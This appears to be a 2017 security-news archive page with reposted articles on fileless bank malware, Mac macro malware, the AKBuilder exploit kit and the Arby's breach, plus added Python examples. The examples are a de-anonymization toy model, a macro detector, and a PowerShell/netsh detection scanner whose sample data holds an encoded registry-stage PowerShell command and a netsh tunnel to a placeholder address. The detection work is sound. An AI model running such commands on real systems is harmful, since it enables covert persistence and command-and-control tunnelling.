Monthly Archives: February 2017

New “Fileless Malware” Targets Banks and Organizations Spotted in the Wild

More than a hundred banks and financial institutions across the world have been infected with a dangerous, sophisticated, memory-based malware that is almost undetectable, researchers warned.

A newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US, South America, Europe and Africa, with fileless malware that resides solely in the memory of the compromised computers.

Fileless malware was first discovered by the same security firm in 2014, but it had never been mainstream until now.

Fileless malware is a piece of nasty software that does not copy any files or folders to the hard drive in order to get executed. Instead, payloads are injected directly into the memory of running processes, and the malware executes in the system’s RAM.

Since the malware runs only in memory, memory acquisition becomes useless once the system is rebooted, making it difficult for digital forensics experts to find traces of the malware.

The attack was initially discovered by a bank’s security team after they found a copy of Meterpreter — an in-memory component of Metasploit — inside the physical memory of a Microsoft domain controller.


After conducting a forensic analysis, Kaspersky researchers found that the attackers leveraged Windows PowerShell to load the Meterpreter code directly into memory rather than writing it to the disk.

The cyber crooks also used Microsoft’s NETSH networking tool to set up a proxy tunnel for communicating with the command and control (C&C) server and remotely controlling the infected host.

They also stashed the PowerShell commands in the Windows registry in an effort to eliminate nearly all traces of the attack left in logs or on the hard drive after a reboot of the device, making detection and forensic analysis difficult.


The attackers’ ultimate goal was apparently to compromise the computers that control ATMs so that they could steal money.

Kaspersky Lab researchers plan to reveal more details in April about the attack, which is occurring on an industrial scale worldwide.

The attack has already hit more than 140 enterprise networks in a range of business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK, and Russia. And since the threat is so hard to spot, the actual number is likely much higher.


via:  thehackernews

Your web browsing history can be linked to your social media accounts

Your web browsing history contains enough information for third parties to be able to link it to your social media profile (Twitter, Facebook, Reddit), Stanford and Princeton researchers have found.

Worrying research results

“Our approach is based on a simple observation: each person has a distinctive social network, and thus the set of links appearing in one’s feed is unique. Assuming users visit links in their feed with higher probability than a random user, browsing histories contain tell-tale marks of identity,” they shared.

They tested their approach first on simulated browsing histories containing links originating from Twitter, then in practice with the help of 374 individuals who chose to participate in the research and “donate” their browsing histories.

The result of that last test? Over 70 percent of the individuals were correctly tied to their Twitter accounts. While not perfect, the result is impressive, and even more so because a correctly identified account is one of over 300 million opened on Twitter.

Granted, users are not expected to hand over their browsing history to anyone who would like to peruse it, but for this approach to succeed they don’t have to.

“Several online trackers [e.g. Google, Facebook, ComScore, AppNexus] are embedded on sufficiently many websites to carry out this attack with high accuracy,” they noted, despite claims by ad tech companies that online tracking is not a threat to user privacy.

How to protect your privacy?

“Any social media site can be used for such an attack, provided that a list of each user’s subscriptions can be inferred, the content is public, and the user visits sufficiently many links from the site. For example, on Facebook subscriptions can be inferred based on ‘likes,’ and on Reddit based on comments, albeit incompletely and with some error,” the researchers explained.

“Further, it is inherent in the web’s design and users’ behavior, and is not due to specific, fixable vulnerabilities by browsers or websites, unlike previous de-anonymization attacks. It simultaneously confirms the fingerprintability of browsing profiles and the easy availability of auxiliary information. Application-layer de-anonymization has long been considered the Achilles’ heel of Tor and other anonymity systems, and our work provides another reason why that is the case,” they concluded.

The researchers’ approach is less potent if employed by network adversaries – Internet service providers, open Wi-Fi network sniffers, state actors – because of the increasingly widespread adoption of HTTPS. When basing their testing just on HTTP requests, of the 374 individuals who participated in the research only 31% were tied correctly to their Twitter account.

“We hypothesize that the attack will still work in this scenario but will require a greater number of links per user,” they noted, and added that tools like HTTPS Everywhere can help make the attack harder and more time-consuming to execute.

Unfortunately, HTTPS is no protection against third-party trackers. To make their task harder users will have to use tracker-blocking tools such as Ghostery, uBlock Origin, or Privacy Badger, and/or give up social media accounts, especially if they are opened under their real name.
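As an added illustration (not the researchers’ code or data), the toy model below scores a synthetic browsing history against made-up candidate feeds using the likelihood-ratio idea quoted above, and its simulate() function reproduces the point made about network observers: attribution accuracy falls as the observer sees fewer of the visited links. All user names, feeds, probabilities and the population size are constructed.

```python
"""Toy model of the feed-versus-history linkage described in the article.

Synthetic data only: three candidate users with made-up feed link sets, one
history to attribute, and a population of UNIVERSE_SIZE possible links.
Scoring is a log-likelihood ratio against a 'random user' baseline, following
the stated observation that people visit their own feed's links more often.
"""
import math
import random

UNIVERSE_SIZE = 1000          # number of distinct links in the population (constructed)
P_IN = 0.5                    # chance a user visits a link from their own feed (assumed)
P_OUT = 1.0 / UNIVERSE_SIZE   # chance a random user visits any given link (baseline)

# Constructed feeds: alice and bob share links 5-8 to make the problem non-trivial.
FEEDS = {
    "alice": {1, 2, 3, 4, 5, 6, 7, 8},
    "bob":   {5, 6, 7, 8, 9, 10, 11, 12},
    "carol": {13, 14, 15, 16, 17, 18, 19, 20},
}


def score_candidates(history, feeds=FEEDS, p_in=P_IN, p_out=P_OUT):
    """Log-likelihood ratio of each candidate versus the random-user baseline.

    Visited feed links count for a candidate; feed links that were *not*
    visited count against them, so a very large feed cannot win by accident.
    """
    hit = math.log(p_in / p_out)
    miss = math.log((1 - p_in) / (1 - p_out))
    scores = {}
    for user, feed in feeds.items():
        visited = len(history & feed)
        scores[user] = visited * hit + (len(feed) - visited) * miss
    return scores


def identify(history, feeds=FEEDS):
    """Return the best candidate and its margin over the runner-up (in nats)."""
    scores = score_candidates(history, feeds)
    ranked = sorted(scores, key=scores.get, reverse=True)
    margin = scores[ranked[0]] - scores[ranked[1]] if len(ranked) > 1 else float("inf")
    return ranked[0], margin


def simulate(observe_fraction, trials=300, noise_links=5, seed=1, feeds=FEEDS):
    """Fraction of synthetic histories attributed to the right user.

    observe_fraction models how much of the history the observer sees: 1.0 for
    a tracker embedded on the pages themselves, lower for a network observer
    who only sees the requests that are not protected by HTTPS.
    """
    rng = random.Random(seed)
    users = list(feeds)
    correct = 0
    for _ in range(trials):
        true_user = rng.choice(users)
        # A user visits each of their own feed links with probability P_IN ...
        full = {link for link in feeds[true_user] if rng.random() < P_IN}
        # ... plus some unrelated browsing drawn from the whole population.
        full |= {rng.randrange(UNIVERSE_SIZE) for _ in range(noise_links)}
        observed = {link for link in full if rng.random() < observe_fraction}
        guess, _ = identify(observed, feeds)
        correct += guess == true_user
    return correct / trials


if __name__ == "__main__":
    print(identify({1, 2, 5, 6, 400}))
    print("full visibility:", simulate(1.0), "20% visibility:", simulate(0.2))
```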


via:  helpnetsecurity

Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild


After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.


The emergence of the first macro-based Word document attack against Apple’s macOS platform is the latest example to prove this.

The concept of macros dates back to the 1990s. You might be familiar with the message that reads: “Warning: This document contains macros.”

A macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.

Until now, hackers were cleverly using this technique to target Windows.

However, security researchers have now detected the first in-the-wild instance of hackers using malicious macros in Word documents to install malware on Mac computers and steal data – an old Windows technique.


The hack tricks victims into opening infected Word documents that subsequently run malicious macros. One such malicious Word file discovered by the researcher was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.”

However, after opening the malicious Word document, and before the macro can run on the system, Mac users are always prompted to enable macros.

Denying permission can save you, but if macros are enabled despite the warning, the embedded macro executes a function, coded in Python, that downloads the malware payload to infect the Mac, allowing attackers to monitor webcams, access browser history logs, and steal passwords and encryption keys.

According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre – an open source Mac and Linux post-exploitation agent.

“It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out,” said Wardle.

Wardle tracked the IP address from which the malicious Word documents were spread to Russia; that IP has previously been associated with malicious activities like phishing attacks.


Another malicious attack discovered by researchers this week also relied on standard Windows techniques, prompting users to download and install a fake software update that actually harvests the user’s Keychain, phishes usernames and passwords, and collects other sensitive data.

The MacDownloader malware presented itself as both an update for Adobe Flash and the Bitdefender Adware Removal Tool, the kind of prompt most users find annoying and simply dismiss. That is exactly what the attackers want: whether the user clicks to reject the update or just presses yes to dismiss it once and for all, the malware gets the green light to harvest the user’s keychain, phish usernames and passwords, collect private and sensitive data, and send them back to the attackers.

Researchers have spotted this macOS malware targeting mostly the defense industry, and it has reportedly been used against a human rights advocate.

The best way to avoid these kinds of attacks is simply to deny permission for macros to run when opening a suspicious Word document, and to avoid downloading software from third-party app stores or untrusted websites.
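The “enable macros” prompt is the last line of defence described above; a static check can flag a macro-bearing Word file before anyone opens it. The example below is added here (it is not Wardle’s or Synack’s code): a Word file is a zip of OOXML parts, and a macro-enabled document carries a word/vbaProject.bin part and declares it in [Content_Types].xml. The sample documents are constructed in memory; the fake vbaProject.bin content is a placeholder, not a real VBA project.

```python
"""Flag macro-bearing Word documents by inspecting the OOXML package."""
import io
import zipfile

# Standard OOXML content types (real values used by Word).
VBA_PART_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_MAIN_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_TYPE = ("application/vnd.openxmlformats-officedocument"
                   ".wordprocessingml.document.main+xml")


def build_sample(with_macro):
    """Construct a minimal .docx/.docm package in memory (constructed sample data)."""
    main_type = MACRO_MAIN_TYPE if with_macro else PLAIN_MAIN_TYPE
    overrides = [f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>']
    if with_macro:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_PART_TYPE}"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + "".join(overrides) + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes only: a real vbaProject.bin is an OLE compound file.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


def inspect_office_document(data, claimed_extension=None):
    """Return a dict of findings; 'has_vba' is the headline signal.

    claimed_extension (e.g. '.docx') lets the caller spot a macro document
    that hides behind a harmless-looking extension.
    """
    result = {
        "is_ooxml": False,
        "has_vba_part": False,        # a vbaProject.bin part exists in the zip
        "declares_vba_type": False,   # [Content_Types].xml references the VBA type
        "macro_enabled_main": False,  # main part declared as macroEnabled
        "has_vba": False,
        "extension_mismatch": False,
    }
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result
    with z:
        names = z.namelist()
        if "[Content_Types].xml" not in names:
            return result
        result["is_ooxml"] = True
        result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        ct = z.read("[Content_Types].xml").decode("utf-8", errors="replace")
        result["declares_vba_type"] = VBA_PART_TYPE in ct
        result["macro_enabled_main"] = MACRO_MAIN_TYPE in ct
    result["has_vba"] = (result["has_vba_part"] or result["declares_vba_type"]
                         or result["macro_enabled_main"])
    if claimed_extension and claimed_extension.lower() == ".docx" and result["has_vba"]:
        result["extension_mismatch"] = True
    return result


if __name__ == "__main__":
    print("clean .docx :", inspect_office_document(build_sample(False), ".docx"))
    print("macro .docm :", inspect_office_document(build_sample(True), ".docm"))
```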


via:   thehackernews

Memory-Based Malware Uses PowerShell Scripts, Pentest Tools to Evade Detection

A memory-based malware is using PowerShell scripts stored in the Windows registry, along with penetration testing tools, to evade detection.

Security researchers at Kaspersky Lab came across the malware when they discovered code for Meterpreter, a post-exploitation tool from the Metasploit penetration testing framework, inside the physical memory of a domain controller. Analysis of the malware, detected as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit, turned up PowerShell scripts launched from within the Windows registry. Kaspersky’s researchers also found that the attackers had used the NETSH network configuration scripting utility to tunnel traffic from the host to their command and control (C&C) server.

The scripts used by the attackers allocate memory and load Meterpreter into RAM. Using the SC utility, the attackers installed a malicious service to execute one of those scripts on the target computer. They then set up a tunnel using NETSH to forward all network traffic to their C&C server, allowing them to steal passwords and sensitive information.

NETSH, SC, and PowerShell scripts all require elevated privileges. But that’s no hurdle for attackers who are familiar with Mimikatz, another Metasploit post-exploitation tool: they simply created a payload that allowed them to steal system administrators’ credentials.

As of this writing, the malware has affected 140 organizations in 40 countries. It’s not clear whether the same attacker targeted all of those enterprises, because attribution in this case is particularly difficult.

Kaspersky’s researchers elaborate on that point in a blog post:

“During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible.”

Nevertheless, some evidence suggests GCMAN and Carbanak could be the responsible parties.

This attack is detectable only in RAM, on the network, and in the registry. With that in mind, organizations should use Kaspersky’s indicators of compromise (IoCs) to protect against this malware. Should they find it, they should remove the malware from their systems and then change all administrator passwords.
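Both this article and the first one on this page name the same three host-side traces: PowerShell stashed in the registry, a service created with SC to launch it, and a NETSH port proxy that tunnels C&C traffic. The detection pass below is an added example (not Kaspersky’s code or IoCs) that scans constructed telemetry records for those traces and decodes any PowerShell -EncodedCommand it finds. The record format, rule names, registry paths, service name and 203.0.113.10 address are all constructed for the example.

```python
"""Scan registry autorun values and process command lines for the traces the
Kaspersky report describes. Sample records are constructed, not real telemetry."""
import base64
import re

# Tokens that, inside a decoded -EncodedCommand, suggest in-memory staging.
SUSPICIOUS_TOKENS = ("IEX", "Invoke-Expression", "FromBase64String",
                     "DownloadString", "VirtualAlloc", "Reflection.Assembly")

# powershell ... -e/-ec/-enc/-EncodedCommand <base64>
ENC_RE = re.compile(r"(?i)\bpowershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# sc create <name> binPath= "<command line>"
SC_RE = re.compile(r'(?i)\bsc(?:\.exe)?\s+create\b.*binpath=\s*"?(.*)')
# netsh interface portproxy add ... (the tunnelling feature of NETSH)
NETSH_RE = re.compile(r"(?i)\bnetsh\s+interface\s+portproxy\s+add\b")


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(records):
    """Return a list of findings, one dict per matched rule per record."""
    findings = []
    for rec in records:
        text, source, path = rec["value"], rec["source"], rec.get("path", "")
        m = ENC_RE.search(text)
        if m:
            decoded = decode_encoded_command(m.group(1))
            tokens = [t for t in SUSPICIOUS_TOKENS
                      if decoded and t.lower() in decoded.lower()]
            findings.append({"rule": "powershell_encoded", "source": source,
                             "detail": decoded or "<undecodable>", "tokens": tokens})
        if source == "registry" and "powershell" in text.lower():
            findings.append({"rule": "registry_powershell", "source": source,
                             "detail": path, "tokens": []})
        m = SC_RE.search(text)
        if m and "powershell" in m.group(1).lower():
            findings.append({"rule": "service_powershell", "source": source,
                             "detail": m.group(1), "tokens": []})
        if NETSH_RE.search(text):
            findings.append({"rule": "netsh_portproxy", "source": source,
                             "detail": text, "tokens": []})
    return findings


# Constructed stage script: reads a second stage out of the registry and runs it.
STAGE = "IEX (Get-ItemProperty 'HKLM:\\SOFTWARE\\ExampleCorp').stage"
ENCODED = base64.b64encode(STAGE.encode("utf-16-le")).decode("ascii")

SAMPLE_RECORDS = [  # constructed telemetry, not from any real host
    {"source": "registry",
     "path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upd",
     "value": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"source": "process",
     "value": 'sc create WinUpdSvc binPath= "cmd /c powershell -nop -c Get-Date" start= auto'},
    {"source": "process",
     "value": "netsh interface portproxy add v4tov4 listenport=4444 "
              "listenaddress=0.0.0.0 connectport=443 connectaddress=203.0.113.10"},
    {"source": "process", "value": r"powershell.exe -File C:\Scripts\backup.ps1"},   # benign
    {"source": "registry",
     "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Program Files\Example\updater.exe"},                              # benign
]


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f["rule"], "|", f["source"], "|", f["detail"], f["tokens"])
```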


via:  tripwire

DHS mulls password collection at borders

John Kelly, the new secretary of the Department of Homeland Security, testified that foreign travelers coming to the United States could be required to give up social media passwords to border officials as a condition of entry.

“We want to say, for instance, which websites do you visit, and give us your passwords, so we can see what they do on the internet,” he said at a Feb. 7 House Homeland Security hearing, his first congressional hearing since his Senate confirmation. “If they don’t want to give us that information, they don’t come in.”

Kelly noted that this was “still a work in progress” and not necessarily “what we’re going to do right now,” but added that President Donald Trump’s freeze on entry to the U.S. by citizens of seven countries “is giving us an opportunity… to get more serious than we have been about how we look at people coming into the United States.”

“These are the things we’re thinking about,” he said. “We can ask them for this kind of information, and if they truly want to come into America, then they’ll cooperate. If not, you know, next in line.”

DHS has already announced plans to seek social media data from travelers visiting the U.S. under the visa waiver program. That plan, first floated in June 2016, would authorize data collection of social media identifiers from travelers on the visa waiver program, which allows for visa-free travel by passport holders of more than 30 countries, mostly long-established U.S. allies and trading partners. Requesting passwords, as contemplated by Gen. Kelly, would be a more intensive form of social media vetting.

Kelly also took responsibility for the mismanaged rollout of Trump’s freeze, saying he should have delayed it “a day or two… so I could have talked to members of Congress.”

Kelly also provided an update on plans to construct a wall across the border with Mexico.

Without providing details on funding, Kelly said he would like to see aerostats, as well as improved “sensors on the ground” to track movement along the border, and expected the project to be “well underway within two years.”

“Some of the sensors are really kind of 1980s technology,” he said. “There’s better equipment on the market today, so we’re going to take a long, hard look at that.”

Kelly also said that he does “not believe” DHS will receive the 5,000 border patrol employees and the 10,000 new Immigration and Customs Enforcement employees, as laid out in Trump’s executive order, in the next few years.

The secretary said he would rather “get fewer” officers than lower standards. “We will add to the ranks as fast as we can, but we will not lower standards or training,” Kelly said.


via:  fcw

Google & H&M’s Ivyrevel will make you a dress customized using your personal data

At last year’s Google I/O developer conference, Google introduced a new Awareness API that would allow for smarter applications that could understand where you were, what you were doing, what’s nearby, and even the weather, in order to more intelligently react to your current situation. Today, Google introduced a new application that’s taking advantage of this sort of data in order to…design you a dress.

Yes, a dress.

Uhhh???

Google says it teamed up with H&M’s digital fashion house Ivyrevel on a project dubbed “Coded Couture.”

Through a forthcoming Android application, users can consent to have their activity and lifestyle data monitored – by way of the Awareness API – to create their own personalized, custom-made dress, which is ordered through the app. Excuse me, it’s officially called the “Data Dress,” says Google.


Specifically, the Android app being developed now will use the Snapshot API to monitor the person’s daily activity and lifestyle, including things like where they traveled, where they eat dinner or hang out with friends, the typical weather in the area, and more. This information is collected over a week’s time, then used to create a digitally tailored dress that can be bought within the app.

The idea is that you can translate your life and your lifestyle into a unique, wearable look. But in reality, the resulting creation mainly displays your routes and routines as lines on a map, sans street labels and points of interest. Users can also choose which style of dress they want, whether a look for work, parties, or formal events.

Google says that the choice of material, color, embellishment used, and added details like belt and cuffs are data-driven, as well. For example, the material will be selected based on weather data like the temperature and the fit will be based on the wearer’s activity level.

This doesn’t seem like the best use case for the Awareness API’s capabilities, but there you have it.

Currently, the app is in a closed beta and being tested by a handful of style “influencers,” including Ivyrevel’s co-founder Kenza Zouiten. Interested testers can also sign up to join a later trial ahead of the public release.


Previously, Google had shown off better examples of how the Awareness API could be used in apps, including real estate app Trulia’s smarter push notifications that alert you to open houses only if you’re nearby, walking and it’s nice outside. Another, Runkeeper, lets you tag your posts with the current weather, while a music streaming app Superplayer Music took advantage of the new tool to suggest music based on your activity and location – like workout music for the gym.

The custom dresses will start at $99, and the app will release later this year.


via:  techcrunch

WhatsApp Improves Message Security with Two-Step Verification

WhatsApp is implementing a new two-step verification process to boost security for users. The optional security feature significantly increases the hurdles that a third-party would have to get over to break into a user’s account.

The feature, which has been in testing since November, is rolling out in stages. To turn on two-step verification, users need to log in to WhatsApp, navigate to Settings, then Account and enable Two-step verification.

If activated, users will need to enter a six-digit security code in addition to their phone number and text message or voice call verification. They will also be asked to enter their security code once every seven days. Should users forget their security code, they can register an email address with WhatsApp and use it to turn off two-step verification.

WhatsApp said: “We do not verify this email address to confirm its accuracy. We highly recommend you provide an accurate email address so that you’re not locked out of your account if you forget your passcode.”

Users who do not register an email address with WhatsApp will still be able to log back into the service if they forget their two-step passcode, but only seven days after they last used WhatsApp.

WhatsApp said: “After seven days, your number will be permitted to reverify on WhatsApp without your passcode, but you will lose all pending messages upon reverifying — they will be deleted. If your number is reverified on WhatsApp after 30 days of last using WhatsApp, and without your passcode, your account will be deleted and a new one will be created upon successfully reverifying.”

The roll out of the improved security comes weeks after the revelation of a vulnerability in the implementation of WhatsApp’s encryption protocols.


via:  enterprise-security-today

Password Managers Can Heighten Online Security

Passwords are a pain. Actually, they’re more than that. They’re becoming unmanageable. The average person has dozens of passwords they have to keep track of. And that number is only growing as we sign up for more apps and online services. The situation is made even worse by sites and services that require users to change passwords frequently and by widespread hacking attacks that necessitate replacing passcodes.

Many people resort to simple tricks — using simple, easy to remember passwords; reusing favorite ones over and over; or slightly altering passwords by changing their order or substituting numbers for letters. But these passcodes are often easy to guess, and if your password on one site is compromised, a hacker can potentially gain access to your accounts on other sites.

As hopeless and frustrating as all this seems, there is a solution — using a password manager. I’ve been testing out a couple — after long resisting them — and am now wondering why I didn’t start using one sooner.

But a recent meeting with cybersecurity experts with the Electronic Frontier Foundation spurred me to finally start using a password manager.

Bill Budington, a security engineer and technologist at the EFF, recommended three different password managers — 1Password, LastPass and KeePassX. I focused on 1Password and LastPass, because they each are more complete products than KeePassX, which is an open-source effort whose different components are cobbled together.

Both LastPass and 1Password work similarly. They each store your passwords in a locker in the cloud. You set a master password — hopefully a long and strong one — that encrypts all your data within the locker.

Each of the two companies offers PC programs, browser plug-ins and mobile apps. When you access a website or service on your computer, each service will offer to remember your existing password or, if it’s already in their system, will automatically fill in your log-in information. If you ask them, both systems will also randomly generate new, more secure passwords, letting you adjust their length or character set to meet the requirements of particular sites.

You can use LastPass for free. For $12 a year, you’ll get 1 gigabyte of storage and the ability to share passwords with up to five people in your family. By contrast, 1Password costs $35.88 a year for a single user and $59.88 for up to five users.


via:  enterprise-security-today

AKBuilder is the latest exploit kit to target Word documents, spread malware

Attackers continue to use Office exploits to proliferate malware, and SophosLabs has traced the activity to three popular exploit builders.

We described the first two – Microsoft Word Intruder and Ancalog Builder – in earlier papers. A new paper released today examines the third one: AKBuilder.

AKBuilder generates malicious Word documents, all in Rich Text, according to the paper’s author, SophosLabs principal researcher Gábor Szappanos. Once purchased, malicious actors use it to package malware samples into booby-trapped documents they can then spam out.

Like its two cousins, AKBuilder produces deliberately corrupted files that automatically trigger bugs in Office and underlying bugs in Windows itself.

AKBuilder is advertised in YouTube videos and sold in underground forums. The kit usually costs around $550 (payable in electronic currencies like Bitcoin and Perfect Money). Here’s an example:

[Screenshot: AKBuilder price advertisement]

AKBuilder anatomy

Szappanos wrote about two variations of the kit, which are differentiated by the Office vulnerabilities they target. The earlier version, AK-1, uses two exploits in the same document: CVE-2012-0158 and CVE-2014-1761. The newer version, AK-2, uses a single exploit: CVE-2015-1641.

Both versions are released as a Python script. Everything is hardcoded and there is no configurable option apart from the file names, Szappanos wrote.

The script takes three parameters. The first parameter is the name of the payload file, the second is the name of the decoy document, and the final is the name of the generated exploit document.

All of the known builders have the same rough structure. The hardcoded exploit block, with first- and second-stage shellcodes, is stored as a huge data block in the script:

[Screenshot: RTF template data block in the builder script]

The encrypted payload and decoy files are appended after the template content. This is a very rigid structure: any modification requires an update to the builder. The beginnings of the generated files, up to the embedded payload, are identical.

This can only serve as the “release build” of the builder. The script contains the entire document as a single block of data. This block is often modified by the author to avoid detection by antivirus engines. The modifications, though they could be done manually, are more likely done by an internal tool owned (and not released) by the author. This internal tool generates the highly obfuscated exploit document, which is then packaged in the Python script.

The kit is used by various cybercrime groups, distributing dozens of different malware families. The most active (or least careful) of these criminals are Nigerian BEC groups.

AK-1- and AK-2-generated documents are detected by Sophos as Troj/20141761-F, Troj/DocDrop-FK or Troj/DocDrop-JK.

Lifecycle

AK-1 was most active between the middle of 2015 and 2016. The emergence of its successor AK-2 seemed to spell the end of the kit’s lifespan. By the summer of 2016, it seemed extinct.

But we recently started to observe a resurrection of AK-1 samples. Szappanos said it’s too early to speculate, but thinks it may be associated with the disappearance of the Ancalog builder.

There was a significant market gap that needed the older Office exploits provided by AK-1, and when there is a need, there is a solution.

AK-2

Szappanos wrote about the characteristics of this kit back in a research paper published on Naked Security last year.

As with its predecessor, we are not aware of other public reports about this exploit kit, so we have no official name for it.

The source code of the builder is based on the AK-1 builder Python script and it shows the same characteristics.

Distributed malware

SophosLabs identified about 760 malicious documents generated by AK-1, which were used to distribute more than 50 different malware families.

In its heyday, the most popular Trojans (Zbot, Chisburg, Fareit, Neurevt) were favored, but with the appearance of AK-2 these variants have slowed down somewhat. It appears a few diehard groups are still using the older version of the kit, but they are mostly deploying the PredatorPain keylogger (the most frequent beneficiary of the kit) and the NetWiredRC backdoor.

The following chart shows the malware families distributed by AK-1 and AK-2:

[Chart: malware families distributed by AK-1 and AK-2]

Attribution

In the case of AKBuilder, it is hard to tell how many individuals or groups are working on it. Because it is a simple Python script, it is very easy to steal the builder and start a new “development branch”. It is quite possible that the work was started by a single individual, and then others jumped in and stole the code, releasing their own versions.

It is clear though that the known builder versions come from the same origin and could be considered as belonging to the same development branch even though there are multiple email accounts connected to it.

Some of the distributors (including the most persistent one) are seemingly from the Arabic regions. There is no proof that there is any connection between them, though.

But apart from them, there are a handful of other, seemingly unrelated developers/distributors who sell versions of this kit. We suspect that most of them work independently, purchasing one version of the kit, then modifying and distributing it on their own. Some of them distribute only this kit, others seem to be involved in selling a wide range of malicious software builders.

This is possible because the release version of the kit is written in Python which makes it easy to understand and modify.

SophosLabs believes there are about half a dozen individuals involved in developing and distributing AKBuilder, but the exact connections between them are less clear.

Conclusion and defensive measures

Cyber-criminals find Office documents useful for delivering malicious programs to their targets. They’ve been using this method steadily over the past two years, and there is no sign that they intend to give up.

The availability of black-market tools makes it possible for a wide range of criminals to generate the exploited documents. After the disappearance of the Ancalog builder, AKBuilder took over as the most popular choice of these tools.

The rigid hard-coded structure of AKBuilder means that for any change in the generated samples, a new version must be released. That information helps the defenders: even if the first few samples go undetected, a quick signature update can protect the users for days or even weeks.

The dependence of criminals on the commercial offerings has a disadvantage for them: the builder doesn’t use zero-day exploits or even exploits that could be considered as new.

AKBuilder shows moderate progressiveness: new exploits like CVE-2014-1761 and CVE-2015-1641 were supported relatively quickly after they became available. But the kit is far from using zero-day exploits; in both cases the first use of the exploit came months after the vulnerability was disclosed and the patch made available.

In the final analysis, it shouldn’t be difficult to protect against these kinds of activities: just applying recent patches for Microsoft Office should disarm the attack.


via:  sophos

Fast Food Chain Arby’s Acknowledges Breach

Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide.

A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.

“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.

“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”

Arby’s said the breach involved malware placed on payment systems inside Arby’s corporate stores, and that Arby’s franchised restaurant locations were not impacted.

Arby’s has more than 3,330 stores in the United States, and roughly one-third of those are corporate-owned. The remaining stores are franchises. However, this distinction is likely to be lost on Arby’s customers until the company releases more information about individual restaurant locations affected by the breach.

“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”

The first clues about a possible breach at the sandwich chain came in a non-public alert issued by PSCU, a service organization that serves more than 800 credit unions.

The alert sent to PSCU member banks advised that PSCU had just received very long lists of compromised card numbers from both Visa and MasterCard. The alerts stated that a breach at an unnamed retailer compromised more than 355,000 credit and debit cards issued by PSCU member banks.

“PSCU believes the alerts are associated with a large fast food restaurant chain, yet to be announced to the public,” reads the alert, which was sent only to PSCU member banks.

Arby’s declined to say how long the malware was thought to have stolen credit and debit card data from infected corporate payment systems. But the PSCU notice said the breach is estimated to have occurred between Oct. 25, 2016 and January 19, 2017.

Such a large alert from the card associations is generally a sign of a sizable nationwide breach, as this is likely just the first of many alerts Visa and MasterCard will send to card-issuing banks regarding accounts that were compromised in the intrusion. If history is any lesson, some financial institutions will respond by re-issuing thousands of customer cards, while other (likely larger) institutions will focus on managing fraud losses on the compromised cards.

The breach at Arby’s comes as many credit unions and smaller banks are still feeling the financial pain from fraud related to a similar breach at the fast food chain Wendy’s. KrebsOnSecurity broke the news of that breach in January 2016, but the company didn’t announce it had fully removed the malware from its systems until May 2016. But two months after that the company was forced to admit that many Wendy’s locations were still compromised.

B. Dan Berger, president and CEO of the National Association of Federal Credit Unions, said the number of cards that PSCU told member banks were likely exposed in this breach is roughly in line with the numbers released not long after news of the Wendy’s breach broke.

“Hundreds of thousands of cards is a big number, and with the Wendy’s breach, the alerts we were getting from Visa and MasterCard were in the six-digit ranges for sure,” Berger said. “That’s probably one of the biggest numbers I’ve heard.”

